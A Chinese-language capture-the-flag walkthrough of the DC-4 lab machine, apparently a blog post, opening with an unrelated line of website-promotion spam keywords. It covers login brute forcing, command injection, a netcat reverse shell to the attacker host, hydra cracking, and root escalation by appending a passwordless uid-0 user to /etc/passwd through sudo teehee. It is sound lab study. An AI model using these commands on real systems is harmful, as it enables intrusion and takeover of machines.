山西手动网站建设推广,网站建设国家和行业标准,分销网站制作条件,谷歌网站为何打不开攻击机#xff1a;kali
靶机#xff1a;DC-4
一#xff0c;信息收集
1.主机发现
找寻同网段下存活的主机
arp-scan -l2.端口扫描
查看此主机上有哪些开放端口
nmap -sV -p- 192.168.126.136发现22#xff0c;80端口#xff0c;远程连接跟网站#xff08;大概…攻击机kali
靶机DC-4
一信息收集
1.主机发现
找寻同网段下存活的主机
arp-scan -l2.端口扫描
查看此主机上有哪些开放端口
nmap -sV -p- 192.168.126.136发现2280端口远程连接跟网站大概
3,目录扫描
查看网站后台目录 dirsearch -u http://192.168.126.136 好像没有发现敏感信息
二开始渗透
1.用户登录爆破
最开始尝试了几个弱口令没成功一气之下直接开始爆破
打开这个网页 看提示应该是管理员登录用户名直接用admin
使用burp抓包 这里只用爆破密码 字典网上都不少直接下载top5000的字典 查看结果发现密码是happy 成功登录 试了一下这几个选项发现这个是一个命令执行页面
2.任意命令执行
还是使用burp抓包发到repeater 可以看出来这个是通过radio的值进行命令执行
试一下其他命令看行不行试了一下idwhoamiip addr之类的都可以执行 猜测这个应该是没有加任何过滤的任意命令执行
3.反弹shell
因为找到了一个任意命令执行的点所以开始nc反弹连接
先在kali端进行监听
nc -lvvp 6666将burp抓的包中指令的部分改成这个后发送
nc 192.168.126.135 6666 -e /bin/bash 成功连接 发现是www-data用户权限很低
先升级shell交互模式避免意外退出又要重新连接
python -c import pty;pty.spawn(/bin/bash)4.提权
查看其他的用户看看有没有突破口
转到/home里这个是Linux的普通用户的位置 发现有三个用户尝试了一下只有jim这个能打开
查看jim文件夹里边 打开test.sh看翻译大概就是要让你暴力去破解
密码文件应该就是那个old-passowrd.bak 这个应该是曾经用过的密码真正的密码应该就在这里面把这个东西复制到kali里面然后使用hydra进行爆破 这个可能会有点慢要等几分钟可以看到jim用户登录密码是jibril04 然后换成jim用户
su jim输入密码jibril04登录
打开刚刚没有权限的mbox文件 意思是我有一个来自root用户的信所以我们去/var/spool/mail邮箱里面找找去 发现是charles发来的信息登录密码^xHhAhvim0y
切换到charles用户 发现还没有root的权限用 sudo -l 看一下自己有什么权限 发现有一个teehee上网搜了一下
teehee是个小众的linux编辑器。如果有sudo权限。可以利用其来提权
核心思路就是利用其在passwd文件中追加一条uid为0的用户条目
用户文件格式为
[注册名]:[口令]:[用户标识号]:[组标识号]:[用户名]:[用户主目录]:[命令解析程序]echo bluechips::0:0:::/bin/bash | sudo teehee -a /etc/passwd按照linux用户机制如果没有shadow条目且passwd用户密码条目为空的时候可以本地直接su空密码登录。所以只需要执行su raaj就可以登录到raaj用户这个用户因为uid为0所以也是root权限
所以添加一个用户,使用teehee执行写入到/etc/passwd中加入到root权限组中 可以看到这样可以不需要密码登录并且有root权限
5.找flag
去/root里找到flag.txt 结束~~
三总结
teehee提权通过修改passwd文件添加一个无密码root权限的用户
echo bluechips::0:0:::/bin/bash | sudo teehee -a /etc/passwd
